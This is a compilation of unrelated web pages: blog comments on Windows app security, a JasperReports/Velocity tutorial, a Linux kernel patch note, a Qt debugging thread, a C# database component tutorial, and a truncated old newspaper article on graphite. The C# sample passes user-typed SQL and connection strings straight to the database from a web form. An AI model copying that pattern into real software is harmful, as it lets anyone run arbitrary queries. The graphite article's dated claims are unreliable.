These are not complaints, just my view on things. Having said all of that, I think Microsoft still tries to do a good job of forcing apps to be compliant with a new OS version by running the various Logo programs. But I'd like to say that the "Certified for Vista" test cases do not mention such checks for the software as Mark describes, even though they enforce such details as manifests, code signatures, etc. I'm not sure what rules the "Designed for Vista" Logo program imposes - I did not work with that - but it might be worthwhile to update the Logo programs with Mark's prescriptions. IMHO, it would promptly force the companies to resolve the mentioned holes in their software, because logo compliance is a matter of business, making the top management take it into account. P.S. I don't belong to any security software company.

Dear Mark! This is a little off-topic, but since I did not receive any response when writing to you by e-mail, I'll try this way. I experienced a nasty bug in the command-line tool Handle - which is in my case more useful than Process Explorer. The bug is reproducible on every Windows XP system. Try to open a .txt file with Excel. Excel will create several *.tmp files in your %temp% directory. These files are called something like 37.tmp or 74.tmp. Now, as long as Excel is open, there is a handle on those files. Process Explorer recognizes that handle. Handle.exe also recognizes it as long as you call it from inside the directory, or use the 8.3 folder names. If you use the full folder names (with "" of course), then it won't recognize the handle. So at first I thought it might be because of the spaces in the folder name "Local Settings". But that's not the case. Create another file in the same directory (even with the same or a similar filename) and open it with a process that puts a handle on it. Now check that file with handle.exe and it works, no matter which way you try it.
So it has something to do with the way Excel opens the file, and the path using spaces or something? Anyway, it would be great if that could be fixed. Wouldn't it be worth a small investigation, and a blog entry? ;-)

I love these articles, even though I have little interest in Windows; it's the technical, investigative techniques that make for compelling reading. Thank you!

Thanks for the feedback, Jody!

You rock, Mark. This article cracked me up because I'm a bit frustrated with the AV companies' petty complaints about ASLR and whatnot. Bottom line: application developers everywhere need to go back to school. When doing research for a project on improvements in Trustworthy Computing, the SDLC, and Vista, and just hanging out on your site, Channel9, and IT Showtime, I've really appreciated how you all are handling business. Bottom line: it's nice that an hour of your research leads to thousands of hours of training and development for those who need to get with the times.

That just goes to show how third-party app developers never used their 3 years of Vista CTP builds to their advantage.

A common reason for lowering security on the Program Files folder for an app is that the app creates data files in that location, and limited users can't create files there so.... The reason often seems to be sheer laziness. It's too easy to use files ("myfile.txt") without any folder name, instead of a proper location with a CSIDL, and too much trouble to change the app.

I think the problem is plainly and simply that the security model is too complex and hard to use effectively without just disabling it. For example, I worked on an app that had to use secure registry keys, and it was a real bitch doing stuff that was even moderately more complicated than the examples you could find on MSDN. Even there the pickings were slim, with useless or buggy example code, and the like.
If the security model is complex, requires a lot of knowledge and use of complex APIs and interfaces, and is poorly documented on top of that, then it's hardly a surprise that people mess it up so regularly. If MS wants to improve the general security of their ecosystem, then they really need to expose simpler APIs and provide MUCH better documentation. Every example that has possible security implications should be coded securely, and be extremely clear in how the security aspects work. People cut and paste code and then go from there. Maybe they shouldn't, but they do, especially when working on new material, and if the examples are crap, well, then that's what gets rolled out. I've seen this elsewhere: just updating the sample code in a scripting language's documentation to use best practices resulted in a general improvement of the whole ecosystem.
http://blogs.technet.com/b/markrussinovich/archive/2007/06/19/1256677.aspx?PageIndex=2
Introduction

JasperReports is an open-source report engine that is used by many organizations that need to generate business data reports. Having the ability to generate reports on business data is crucial, since organizations use these reports to make effective decisions. The people that use these reports often have different roles and analyze different portions of the data. For instance, a customer report that shows the name, address, age, email, and number of orders for each customer might be useful for a certain group of people, while others prefer a customer report that shows only the age and the number of orders for each customer. In other words, different roles within an organization need different report views. To generate different views of a JasperReports report, you need to understand how reports are generated. JasperReports uses an XML document that defines the report design. You use this template file to provide the reporting engine with the information it needs to create the report. In this template file you specify the SQL query, the title of the report, images to include, text for the page headers, the columns that should be shown, and the database fields that make up the column definitions. For instance, a location column in a JasperReports report could be composed of two database fields: city and state. If there is a need to show different columns of a report depending on criteria such as user selections, it can be accomplished in several ways. One programming approach would be to create an XML template file for each possible combination of columns. Then, based on the columns the user wants to see, the application selects the corresponding XML template to generate the corresponding report view. This approach is technically possible but counterproductive, since the only difference among these XML templates is the section that specifies the columns to show.
A different alternative is to load the XML template into memory and then use an XML library, such as JDOM, to perform changes to the XML document based on the user selections. The application would add or remove the column definitions from the in-memory XML template. This approach is also technically possible, but managing the XML structure of the template can turn into a nightmare. A third option is to use the JasperReports design API that is part of the JasperReports library. Instead of using an XML file to specify your report design, you use the JasperDesign class in conjunction with other classes found in the net.sf.jasperreports.engine.design package to specify the properties of your report. Building a report design with this set of classes is similar to the process of building a set of windows and their widgets using the Swing API. First you create the JasperDesign object and then start putting together the pieces that make up the complete report. This is a flexible approach, but the extra code and associated maintenance issues can turn into a problem later on. The most practical option is to generate the XML template at run-time using a Java™-based templating engine. This approach requires you to write a templating file that contains the definition of the XML template. In this templating file, "placeholders" are assigned to the data that cannot be computed at compilation time. This programming approach is useful if different report views are required and the user decides at run-time what columns they would like to see. The templating engine we chose to use is Velocity V1.4. Velocity is an open-source Java-based templating engine that has gained popularity for its ease of use and abundance of documentation. This article explains how to generate a JasperReports XML template from a templating file. As an aid to readers, a sample Web application is provided as a case study.
This Web application uses JasperReports to generate a customer report for a fictitious company named XYZ. A customer report for company XYZ includes data such as name, email, number of orders, location, and age. When this sample application is started, the user is given a page that lets them select which columns they want to include in the report. Users can personalize the customer report by choosing the view (for example, the columns) they are interested in seeing. The sample application can also generate an order report for company XYZ. An order report for company XYZ includes order id, order status, placement method (phone, fax, online), name of the customer who placed the order, and the customer's email. Users can also choose the columns they would like to include in an order report. Both of these reports are generated from the same templating file. The properties that make each report unique are injected into the JasperReports XML template via the Velocity templating engine. You will import the sample application into IBM® Rational® Application Developer V6 and deploy it to a WebSphere® Application Server V5.1 test instance. DB2® UDB V8.2 is used as the enterprise data repository. A SQL script file is provided to create and populate the database tables that are needed by the application.

Assumptions

You should have a working knowledge (but not necessarily mastery) of XML, HTML, SQL, Velocity, and JasperReports. You should be familiar with Rational Application Developer and the WebSphere test environment. If you need introductory information on any of these technologies, please see the Resources section.

Install the sample Web application

To install the sample application, you need to download and unzip the companion ZIP file (see the Download section). Two files are included in this ZIP file: create-db.sql and JReportsEAR.ear (as well as two XML files we will use later). Before you can run the Web application, you need to create and populate a DB2 database named reportdb.
To create this database, run the create-db.sql file. Use the following command to run create-db.sql:

    db2 -svtf create-db.sql

The file JReportsEAR.ear contains the sample Web application. Import JReportsEAR.ear into your Rational Application Developer workspace, using the default options. A new Web project named JReportsWEB should appear in your workspace. In the WebContent/WEB-INF/lib folder of this project, you should see all the JAR files required to run the Web application (see Figure 1). This article uses JasperReports V0.6.5 -- for information on other versions, see the JasperReports home page. If you would like to know more about the dependencies JasperReports has, click on requirements on the left navigation bar of the JasperReports home page.

Figure 1. Project Explorer view in Rational Application Developer after importing sample application.

After importing the application, you should configure a DB2 UDB datasource for the WebSphere Application Server V5.1 test instance where you will run the sample application. Specify jdbc/reportDB as the JNDI name and reportdb as the database name in the definition for the datasource -- otherwise the application won't find the datasource and will not run. Now you can deploy the sample application to your test server instance and start it. Once the test server instance is up and running, right-click on the JReportsWEB project and select Run => Run on Server. An HTML page named customer-report.html will open. This page shows all the columns that can be included in a customer report for company XYZ (see Figure 2), with a check box next to each column. To include a column in the report, the user selects that checkbox. To test this feature, select the columns you want to include in the report and click Generate Report. A new browser window will open showing the customized customer report. The report contains only those columns that were selected.

Figure 2. User can select one or more columns to include in a customer report.
If all columns are selected, the report shown in Figure 3 should be generated.

Figure 3. View of a customer report if all columns were selected

As mentioned earlier, the sample application can also generate order reports. To generate an order report, right-click on the order-report.html file found under the WebContent folder of the JReportsWEB application, and then select Run => Run on Server. Figure 4 shows the page that should be loaded into the browser.

Figure 4. User can select one or more columns to include in an order report

If all columns are selected, the report shown in Figure 5 should be generated.

Figure 5. View of an order report if all columns were selected

Overview of JasperReports and Velocity

Nowadays, generating Web reports from business data is a common requirement for many applications. To address this requirement, software development teams will either write their own code to generate reports, buy a commercial reporting product such as Crystal Reports, or use one of the open-source reporting engines. JasperReports is one of the most popular options for open-source reporting. It is a Java reporting engine that uses XML templates to generate reports that can be delivered to the screen or printer, or output to PDF, HTML, XLS, CSV, and XML. If you are new to JasperReports, you might do a Web search for introductory articles on the subject. We recommend the developerWorks article titled "Generating online reports using JasperReports and WebSphere Studio."

Although JasperReports provides a great degree of flexibility in creating reports, the use of a static XML template limits the flexibility of the content as well as aspects of the overall design. Therefore you need a technology that can manipulate the XML template file at runtime in order to change the reports dynamically.
Velocity is a Java-based template engine that allows processing of text documents and generation of dynamic content using a simple template language called VTL (Velocity Template Language). Although the growing popularity of Velocity can be attributed to its use in J2EE applications and the MVC design pattern, the technology can also be applied in other programming areas. One such application is to use Velocity to generate the XML templates used by the JasperReports engine.

With Velocity you can create a templating file (also known as the VTL template) and abstract out the dynamic elements. Through the references and directives defined by the Velocity Template Language, you can access public methods of Java objects and incorporate the results of those method invocations into the VTL template file. A full treatment of Velocity is out of the scope of this article, so please see the Resources section below for more information.

Merging JasperReports with Velocity

The most common way to generate reports with JasperReports requires the creation of an XML template that serves as the design for your report. Since Velocity can manipulate the content of XML documents, merging the two technologies comes down to changing the XML template used by the JasperReports engine. The VTL template contains the structure of a JasperReports XML template along with VTL expressions spread throughout the different sections of the document.

The first VTL construct found in our sample templating file is used to specify the SQL query string of the report. Although we could have specified the SQL query with a JasperReports parameter, we decided to use a Velocity reference to allow for a more flexible design in our sample application and also to introduce the concept with a simple example.
The XML code looks as follows:

    <queryString>
        <![CDATA[$sql]]>
    </queryString>

Notice that an expression of the Velocity Template Language is used in conjunction with JasperReports XML template elements in order to create our VTL template. Once the VTL template is parsed by the Velocity engine, the $sql reference will be replaced by the corresponding string value.

So far we have not shown how the use of Velocity can help generate dynamic reports, since we could also have used a JasperReports parameter to provide the SQL query. The VTL directives that are used throughout the remaining sections of the VTL template provide the real value of using Velocity to produce the XML template file. The following piece of code demonstrates how to take advantage of the looping directive to dynamically generate the fields section of the report:

    #foreach ($field in $fieldList)
        <field name="$field.name" class="$field.clazzName"></field>
    #end

Once the VTL template is parsed, only fields that have been added to the Velocity context will make it into the resulting XML template file. This gives you great flexibility in selecting the fields you need at runtime.

Another section of the JasperReports XML template that needs to be generated dynamically is the column header:

    <columnHeader>
        <band height="20">
            #set( $x = 0 )
            #foreach ($column in $columnList)
                <staticText>
                    <reportElement mode="Opaque" x="$x" y="5" width="$column.width"
                        height="15" forecolor="#ffffff" backcolor="#bbbbbb" />
                    <textElement textAlignment="Left">
                        <font reportFont="Arial_Bold" />
                    </textElement>
                    <text>
                        <![CDATA[$column.name]]>
                    </text>
                </staticText>
                #set( $x = $x + $column.width )
            #end
        </band>
    </columnHeader>

In order to specify at run time what columns should be included in the final report, we add the column names to the column header section dynamically using the VTL looping directive.
Since we are relying on a Velocity reference, only the columns that are added to the data context will make it into the JasperReports XML template. Along with the column name, you also specify the horizontal position of the data inside each column. Since the #set directive allows for mathematical expressions, we use it to keep track of the horizontal position that corresponds to each subsequent column.

Now that we have seen how to dynamically generate the column header section, let us take a look at how we assemble the detail section of the XML template:

    #set( $x = 0 )
    #foreach ($column in $columnList)
        <textField>
            <reportElement x="$x" y="4" width="$column.width" height="15" />
            <textElement textAlignment="$column.alignment" />
            <textFieldExpression class="$column.clazzType">
                <![CDATA[$column.expression]]>
            </textFieldExpression>
        </textField>
        #set( $x = $x + $column.width )
    #end

Generating the detail section of the XML template is analogous to generating the column header section. Basically you use the same directives already explained, without taking away any of the flexibility that JasperReports offers in the process. One of JasperReports' most attractive features is that it allows you to create an expression that combines fields from the data source with your own text and shows the result of that expression as a single column during report generation. It is critical not to lose the flexibility provided by these expressions, so it is important to associate each column to be displayed in the report with a JasperReports text field expression. In our sample templating file, the text field expression can be obtained through the $column.expression property. Since the $column.expression property should represent a JasperReports text field expression, we need to make sure that it follows the rules and format of such elements. For example, to make a reference to a field, we put the field name inside the $F{} character sequence.
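The running horizontal offset maintained by the #set directive above amounts to a simple accumulation: each column starts where the previous one ended. A dependency-free Java sketch (the widths are hypothetical, not values from the sample application):

```java
public class OffsetSketch {
    // Returns the x position of each column when columns are laid out left to
    // right, mirroring the "#set( $x = $x + $column.width )" bookkeeping in VTL.
    static int[] offsets(int[] widths) {
        int[] xs = new int[widths.length];
        int x = 0;
        for (int i = 0; i < widths.length; i++) {
            xs[i] = x;       // this column starts at the accumulated offset
            x += widths[i];  // next column starts after this one's width
        }
        return xs;
    }

    public static void main(String[] args) {
        // hypothetical column widths in pixels
        for (int x : offsets(new int[] {120, 80, 60}))
            System.out.println("x=" + x);
    }
}
```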
Although there are other areas in the templating file where VTL constructs are used, one particular set of directives should be discussed here. When Velocity finds the "$" character in front of another character or word, it checks to see if there is a corresponding value in the Velocity context. If the reference can't be found, the correct behavior is to output the characters exactly as they appear in the templating file. However, when we started working with Velocity to generate JasperReports XML templates, we found that we could not use the syntax for JasperReports parameters freely. When Velocity parses a VTL template file that contains a JasperReports parameter expression, the $P{} character sequence is processed incorrectly and produces an invalid JasperReports XML template. To avoid this integration problem, we created a VTL reference and assigned it a value equal to the string representing the JasperReports parameter we wanted to use. This can be seen in the following snippet of code:

    <title>
        #set( $baseDir = '$P{BaseDir}' )
        #set( $title = '$P{Title}' )
        #set( $imageFile = '$P{ImageFile}' )
        ...
    </title>

Let's shift our focus from the VTL template file to the Java code used to merge the two technologies. For the most part, using Velocity as a templating tool to produce the JasperReports XML template file does not require a lot of extra code. The main issue to address during the integration of the two technologies is the connection of streams. Although it is technically possible to write the XML template file to the file system and use the JasperReports API to read it back, this approach would severely impact application performance. A better approach is to use Velocity's template object to generate the XML template file and pass the output straight to the JasperReports compiler manager for processing. This concept is shown in Figure 6.

Figure 6. I/O stream connection between Velocity and JasperReports
Since Velocity uses character streams as its output mechanism, this output needs to be converted into a byte stream to make it compatible with the JasperReports input mechanism. Also, the JasperReports compiler manager must read data as soon as the character output stream used by the template object has data available. For that reason, we decided to use piped input and output streams to transfer the data between the Velocity engine and the JasperReports compiler. The following code snippet shows how this is done:

    Template template;
    Context context;
    PipedInputStream inStream;
    BufferedWriter writer;
    Thread thread;
    TemplateCompiler compiler;
    ...
    try {
        PipedOutputStream outStream = new PipedOutputStream();
        writer = new BufferedWriter(new OutputStreamWriter(outStream));
        // Connect input stream to output stream
        inStream = new PipedInputStream(outStream);
        compiler = new TemplateCompiler(inStream);
        thread = new Thread(compiler);
        thread.start();
        template.merge(context, writer);
    } catch (Exception e) {
        throw e;
    } finally {
        if (writer != null) {
            writer.flush();
            writer.close();
        }
    }
    // Wait for thread to finish executing
    thread.join();
    // Get compiled report
    return (compiler.getJasperReport());

The character output stream being passed as a parameter to the merge() method of the Template instance is actually directing the output to a PipedOutputStream object. This output stream is in turn connected to the piped input stream instance used by the JasperReports compiler manager. Since we are using piped streams, we need to read and write the data in different threads; otherwise, our application could deadlock. Once the chain of streams is assembled, parsing of the VTL template begins and a separate thread is spawned. This thread is responsible for calling the compileReport() method of the JasperCompileManager class, which uses the output of the Velocity engine as its input.
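Stripped of the Velocity- and JasperReports-specific classes, the piped-stream handoff described above can be demonstrated with the standard library alone. This is a minimal sketch (the relay method and payload are ours, not the application's code): a writer thread pushes characters into a PipedOutputStream while a second thread consumes them from the connected PipedInputStream, just as the compiler thread consumes the template engine's output.

```java
import java.io.*;

public class PipeDemo {
    // Pushes `payload` through a piped stream pair, reading on a second thread.
    static String relay(String payload) throws Exception {
        PipedOutputStream out = new PipedOutputStream();
        PipedInputStream in = new PipedInputStream(out); // connect the pipe
        StringBuilder received = new StringBuilder();

        // The reader must run in its own thread, or the pipe can deadlock
        // once its internal buffer fills up.
        Thread reader = new Thread(() -> {
            try (Reader r = new BufferedReader(new InputStreamReader(in))) {
                int c;
                while ((c = r.read()) != -1) received.append((char) c);
            } catch (IOException e) {
                throw new UncheckedIOException(e);
            }
        });
        reader.start();

        // Writing side: stands in for template.merge(context, writer).
        try (Writer w = new BufferedWriter(new OutputStreamWriter(out))) {
            w.write(payload);
        } // closing the writer signals end-of-stream to the reader
        reader.join();
        return received.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(relay("<jasperReport/>"));
    }
}
```

Closing the writer is what lets the reader thread terminate; forgetting to close it (or reading and writing on the same thread) is the usual cause of a hang with piped streams.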
When Velocity's template object finishes its processing, we have to wait until the thread that is responsible for compiling the XML template completes as well. After the processing is complete, we can get the JasperReport instance from the compiler manager and start using it for the generation of reports. Now that we have an understanding of how JasperReports and Velocity can work together, let's look at the sample application.

Basic framework to generate JasperReports XML templates at run time

The sample application contains a basic framework for generating JasperReports XML templates from a VTL template. This section focuses on this framework and how it is used by the application. The framework could be extracted, modified, and used in any other application that needs to generate JasperReports XML templates dynamically. After reading this section, you should understand what would be required to add a new type of report to the sample application.

The design of this framework assumes that, in most cases, reports generated by a particular business organization follow a common structure regardless of the type of report (for example, customer report vs. order report) or the view of the report (for example, the columns that should be included). Our definition of report structure is the layout of the different sections that make up a complete report. In the sample application, all types of reports have the following structure or layout: a title, an image next to the title, a page header, a column header (column names), the retrieved data, a page footer that specifies the page number, and a report summary that states how many records are found in the report. In this framework, the layout of these sections is not configurable: these sections always appear in the report and their location is fixed. However, the framework allows configuring the data that will be shown in these sections.
The configurable data that is inserted into the different sections of the JasperReports XML template is obtained from an XML configuration file that exists for each type of report. For the sample application, we created two of these configuration files: customer-report.xml (for the customer report) and order-report.xml (for the order report). These files are included in the ZIP file download. If there were a requirement to add a third type of report to the application, a new XML configuration file would be created for it. A description of the elements of the XML configuration file follows:

- Root element of the document.
- name - Name of the report. It is used to associate a unique name with the set of properties defined in the document (think of the name as a key and the set of properties as the value associated with that name).
- title - Title that should be shown in the report.
- image - Filename of the image that should be shown next to the title. All image files are placed in the WebContent/images folder of the Web application.
- header - Text that should be shown as a page header on every page.
- sql - SQL query to retrieve the report data from the data source.
- fields - Specifies the JasperReports data field definitions that can be included in the JasperReports XML template (data fields store values retrieved from the data source). Every field that the report could show should be listed in this section. Each field is described by a name and a Java class type. As required by the JasperReports engine, each of these fields must appear in the select clause of the SQL query, and the Java class type must be compatible with the data retrieved from the data source (see the quick reference section on the JasperReports Web site for a list of the possible class types).
- columns - Specifies the column definitions that can be included in the report.
Every column that the report could show should be listed in this section. A column is described by a name, a width, an alignment, a JasperReports text field expression, and a Java class type. The name is what appears in the column header; the width must be specified in pixels. Valid values for alignment are Left, Center, Right, or Justified. The JasperReports text field expression specifies what fields are used to populate the column, and the Java class type specifies the class type that should be applied to the text field expression. See the quick reference section on the JasperReports Web site for a list of the possible class types for field expressions.

The properties defined in each XML configuration file are loaded into memory when the Web application is started. A servlet named ReportServlet receives as an initialization parameter (reports.properties) the names of the XML configuration files that should be loaded at startup (see Figure 7).

Figure 7. XML configuration filenames are passed in as a servlet initialization parameter

To help you understand how the data in the configuration file is used, here is a description of the events that occur when a user submits a request. Assume that the user is interested in generating a customer report using the customer-report.html page. When the user's request to generate a report is received, the application uses the value of a hidden HTTP field to determine the configuration information. The value of this hidden field must match the value of the name element in the XML configuration file. If you take a look at the customer-report.xml file, you will see that the value for the name element is 'Customer Report,' which matches the value of the hidden field in the HTML page. Therefore, when a request to generate a report is sent from the customer-report.html page, the application uses the configuration information contained in the customer-report.xml file.
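Put together, a configuration file following the element descriptions above might look like the sketch below. This is purely illustrative: the root element name, attribute-vs-element choices, and all values here are our guesses, and the article's actual customer-report.xml may be shaped differently.

```xml
<!-- Hypothetical report configuration sketch; element names follow the
     descriptions above, but the exact structure and values are assumptions. -->
<report>
    <name>Customer Report</name>
    <title>XYZ Customer Report</title>
    <image>customers.gif</image>
    <header>Company XYZ - Customer Data</header>
    <sql>SELECT NAME, EMAIL FROM CUSTOMER</sql>
    <fields>
        <field name="NAME"  class="java.lang.String"/>
        <field name="EMAIL" class="java.lang.String"/>
    </fields>
    <columns>
        <column name="Name"  width="120" alignment="Left"
                expression="$F{NAME}"  class="java.lang.String"/>
        <column name="Email" width="150" alignment="Left"
                expression="$F{EMAIL}" class="java.lang.String"/>
    </columns>
</report>
```

Note how each column's expression refers to a field declared in the fields section using the $F{} syntax, and how each declared field appears in the select clause of the sql element, as the element descriptions require.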
The configuration information is queried to obtain the SQL query, title, image filename, header string, and definitions of the columns and fields to include in the report. To determine what columns should be included in the report, the application uses the value of an HTTP parameter named columns. The value of this HTTP parameter depends on which columns a user selects. To specify which columns to include in a customer report, the user selects the checkboxes shown on the customer-report.html page (see Figure 2). Each one of these checkboxes is associated with a column name that must be found among the names that appear in the columns section of the customer-report.xml file. Once the application knows what columns should be included in the report, it queries the configuration information to obtain the definitions of those columns only. The field definitions that are extracted from the configuration information also depend on the columns the user selected. Only those fields that are required to populate the columns that were selected are extracted. For instance, if a user selects to see only the name, location, and number of orders columns, then the email and age fields are not extracted since these fields are not required to populate the name, location or number of orders columns. The SQL query, title, header string, columns and field definitions extracted from the configuration file are placed in the Velocity context. After the Velocity context is populated, the templating engine generates the JasperReports XML template, which is then passed to the JasperReports compiler. The only piece of data extracted from the configuration file that is not placed in the Velocity context is the filename of the image. Instead, the image filename is passed as a JasperReports parameter to the JasperReports engine. Once the JasperReports XML template is compiled, the report is ready to be filled with data from the data source. 
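The column- and field-selection step described above can be sketched independently of any servlet or framework code. The Column and Field records below are illustrative stand-ins, not the application's actual classes; the sketch only shows the filtering idea: keep the column definitions the user checked, then keep only the fields those columns reference.

```java
import java.util.*;

public class ReportSelection {
    // Stand-ins for the real configuration objects (names are ours).
    record Column(String name, String fieldName) {}
    record Field(String name, String clazzName) {}

    // Keep only the column definitions whose names the user checked.
    static List<Column> selectColumns(List<Column> all, Set<String> chosen) {
        List<Column> out = new ArrayList<>();
        for (Column c : all)
            if (chosen.contains(c.name())) out.add(c);
        return out;
    }

    // Keep only the fields actually referenced by the selected columns.
    static List<Field> selectFields(List<Field> all, List<Column> columns) {
        Set<String> needed = new HashSet<>();
        for (Column c : columns) needed.add(c.fieldName());
        List<Field> out = new ArrayList<>();
        for (Field f : all)
            if (needed.contains(f.name())) out.add(f);
        return out;
    }

    public static void main(String[] args) {
        List<Column> columns = List.of(
                new Column("Name", "NAME"),
                new Column("Email", "EMAIL"),
                new Column("Age", "AGE"));
        List<Field> fields = List.of(
                new Field("NAME", "java.lang.String"),
                new Field("EMAIL", "java.lang.String"),
                new Field("AGE", "java.lang.Integer"));

        // User checked only Name and Age, so EMAIL is never extracted.
        List<Column> picked = selectColumns(columns, Set.of("Name", "Age"));
        System.out.println(selectFields(fields, picked));
    }
}
```

The selected column and field lists would then be placed in the Velocity context (for example under $columnList and $fieldList) before the template merge.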
At this point, the engine uses the SQL query in the template to query the data source and generate the report.

If you wanted to add a new type of report to the sample application, you would only need to create an XML configuration file and an interface so users can select the columns they would like to include in the report. The name of this XML configuration file would also have to be passed to the ReportServlet (see Figure 7) so the configuration information is loaded at startup and made available to the application. Note that you could go a step further: instead of building the interface manually as we did, you could extend the framework so that the interface is generated from the data in the XML configuration file. This approach should be straightforward -- use Velocity to generate the HTML content of the interface, and then the only steps needed to add a new type of report are creating the XML configuration file and passing the name of that file to the ReportServlet.

Conclusion

This article used a sample Web application as a case study to explain how an application can dynamically generate JasperReports XML templates using the Velocity templating engine. By generating the JasperReports XML template at run time, applications can produce reports that are tailored to user input. To aid in the generation of the XML template, a basic framework was developed. When designing the framework, we made the assumption that reports generated by a particular business organization have a similar structure or layout. This framework could be extracted from the sample application and extended according to your own project's needs.

Download

Resources

- Generating online reports using JasperReports and WebSphere Studio
- The Apache Jakarta Project Velocity
- Start up the Velocity Template Engine
- JasperReports Home Page
- JasperReports API
- Get involved in the developerWorks community by participating in developerWorks blogs.
- Browse for books on these and other technical topics.
- Find out more about WebSphere Studio Application.
http://www.ibm.com/developerworks/websphere/library/techarticles/0505_olivieri/0505_olivieri.html
I toyed with setting up a diskless system in initramfs. In the process, I came across some things:

1) There is no way to have the kernel not mount a filesystem, unless you use /init or rdinit=.

1a) In the process of writing these patches, I found prepare_namespace not to be called if /init is present. prepare_namespace will call security_sb_post_mountroot after mounting the root fs. I did not yet see a way to call this from /init, and grepping kinit for "security" did not help, either. This is probably a bug, but using the features of this patchset, you'll avoid hitting it. Therefore this patchset does nothing about that.

2) If you want to use tmpfs, you need a script which essentially duplicates the work the kernel just did: mount the root fs, unpack or move the files. Using tmpfs instead for the first root mount is as cheap as using ramfs, as long as tmpfs is used anyway (and most likely it is).

2a) I figured if you prepared the root fs to contain a running system, you would probably also set up a runnable system on it. Therefore I changed the default to boot from tmpfs if there was no /init nor a root= option. (If there is a /init, it will be executed as usual.) Unfortunately the way I do it, this will override the rdev setting, but that should be OK, since rdev is dead. Isn't it?

3) While I was at it, I figured I would not need most of the init/mount* code anymore. Therefore I made patch 3, which ifdefs it out as far as possible while still aiming for a small change.

Patch 1 adds the capability to use root=rootfs.
Patch 2 adds the capability to use tmpfs for root, default root=rootfs. ramfs becomes optional if rootfs=tmpfs.
Patch 3 allows removing the capability of automounting filesystems.

All patches apply to 2.6.22.

--
Fun things to slip into your budget
Remuneration compensation upgrade.
(otherwise called a pay raise).
https://lkml.org/lkml/2007/7/13/350
[SOLVED] Linux, Qt 5.2.1: C++/QML application crash only in debug mode

Hi, I'm looking for advice and tips on how to debug this strange issue. My host/target system is Linux (Ubuntu 12.04 LTS 64-bit) and Qt 5.2.1.

1. The application (C++ & QML) compiled in release mode runs without any issue.
2. The same application compiled in debug mode crashes in the QApplication exec() method.
3. The same application compiled in debug mode but started with valgrind does not crash.

The backtrace is always the same, but doesn't give much information (at least to me)...

    __strlen_sse2
    QCoreApplication::arguments()
    ??
    ??
    _SmcProcessMessage
    IceProcessMessage
    ...

Thank you for help!

Could you post a full backtrace from a core file and your source code related to the backtrace?

Unfortunately, I can't disclose the source code and it's a quite big project! It's running already on Win32 and OS X and we are porting it to Linux (desktop first and then to Freescale i.MX6 hardware).

Anyway, I've finally found and fixed the issue! Early in the code, a factory instantiates a QApplication or QtSingleApplication with argc and argv as parameters. In debug mode, the "-qmljsdebugger=port:...,block" argument is added (but not in release mode, which explains why it doesn't crash). This argument is removed (by QApplication?) and argc/argv are updated accordingly. Because argc was not passed by reference to the factory, its value was wrong on return (+1 compared to the number of entries in argv) = crashes when Qt tries to get the length of a non-existent argument!

Glad to hear that the issue is resolved. Thank you for sharing your investigation results.
https://forum.qt.io/topic/39755/solved-linux-qt-5-2-1-c-qml-application-crash-only-in-debug-mode
A simple database access component

This is a generic component that can be used for database access. You can connect to any database with a valid connection string and pass any valid SQL statement.

We all use components and databases these days. Hence, I thought, why not make a generic component that everybody can use? Yes, you can actually use this component for database access. You can connect to any database with a valid connection string and pass any valid SQL statement.

The method DataReader takes two arguments:

- DBStr (the database connection string)
- strSQL (the SQL statement)

The component returns to you an ADO DataReader, which you can databind to an ASP DataGrid. Here is the code for the component (DBAccess.cs):

    namespace DBAccess
    {
        using System;
        using System.Data;
        using System.Data.ADO;

        public class DBRead
        {
            public ADODataReader DataReader(string DBStr, string strSQL)
            {
                // Create the connection
                ADOConnection oCn = new ADOConnection(DBStr);
                // Create the Command object
                ADOCommand oCm = new ADOCommand(strSQL, oCn);
                // Open the connection
                oCn.Open();
                // Declare the DataReader
                ADODataReader oDr;
                // Execute the SQL query
                oCm.Execute(out oDr);
                // Return the DataReader
                return oDr;
            }
        }
    }

You can compile the above code with the following command:

    csc /r:System.Data.dll /t:library DBAccess.cs

We have imported the System.Data namespace in our component, so we need to reference its assembly when compiling.
Here is the ASP.NET code (Client.aspx); some markup attributes were garbled in the original listing and have been restored to match the identifiers used in the code-behind (dbstr, SQL, oDg, Submit_OnClick):

    <%@ Page Language="C#" %>
    <script language="C#" runat="server">
    protected void Submit_OnClick(Object s, EventArgs e)
    {
        // Create an instance of our component
        DBAccess.DBRead oDBr = new DBAccess.DBRead();
        // Declare the DataReader
        ADODataReader oDr;
        // Use the DataReader method of our component
        oDr = oDBr.DataReader(dbstr.Text, SQL.Text);
        // DataBind the DataReader with the DataGrid
        oDg.DataSource = oDr;
        oDg.DataBind();
    }
    </script>
    <html>
    <head>
        <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
        <meta name="CODE_LANGUAGE" Content="C#">
    </head>
    <body>
        <form method="post" runat="server">
            DB String : <asp:textbox id="dbstr" runat="server" /><br/>
            SQL Query : <asp:textbox id="SQL" runat="server" /><br/>
            <asp:button id="Submit" Text="Submit" OnClick="Submit_OnClick"
                runat="server" /><br/>
            <ASP:DataGrid id="oDg" runat="server"
                BackColor="#ccccff" BorderColor="black" ShowFooter="false"
                CellPadding="3" CellSpacing="0" Font-Size="9pt"
                HeaderStyle-BackColor="#aaafff" HeaderStyle-Font-Bold="true" />
        </form>
    </body>
    </html>

You don't have to compile the ASP.NET client separately; it is compiled automatically with the first request. Happy coding!

Source: DotNetExtreme.com
http://searchwindevelopment.techtarget.com/tip/A-simple-database-access-component
What We Owe To Graphite

Published in The Keowee Courier.

This is a story of lead pencils, electric lights, and graphite mines. Do you know that the lead in the pencils you use every day is the product of the earth's inferno of several million years ago? And that the carbons in the powerful electric lights that glow in our streets come from volcanoes that blazed centuries ago when the world was young?

Uncle Sam's scientists have just completed an investigation of graphite mining, sometimes called lead mining, in the United States and the Old World, and the results of this inquiry have developed many interesting facts. Some of the most interesting facts brought out in this inquiry were the few mines of graphite in the world, how artificial graphite or lead is made, and the extraordinary manner in which it is mined in Ceylon, India. It is also explained how nature lays up great stores of lead for future generations of school children.

After making coal, it seems that nature simply took one step further and made graphite, for the latter is nearly pure carbon and was formed through the action of molten rock forced from the bowels of the earth. This rock, after being reduced to almost a fluid state by the tremendous pressure in the center of the earth, was brought into contact with coal. The coal was burned out through chemical actions and the graphite remained.

A description by the scientists of a graphite bed in New Mexico will illustrate how nature goes about the job of making lead. "This is one of the few graphite mines in America. The graphite vein extends into coal fields, which contain coke. In the early ages of the world molten rock was forced into the coal-bearing rocks in many places and formed natural coke, but in some places, due to the presence of certain chemicals, it formed graphite when it came in contact with the coal. The coal was completely graphitized where the rock was forced into the coal bed.
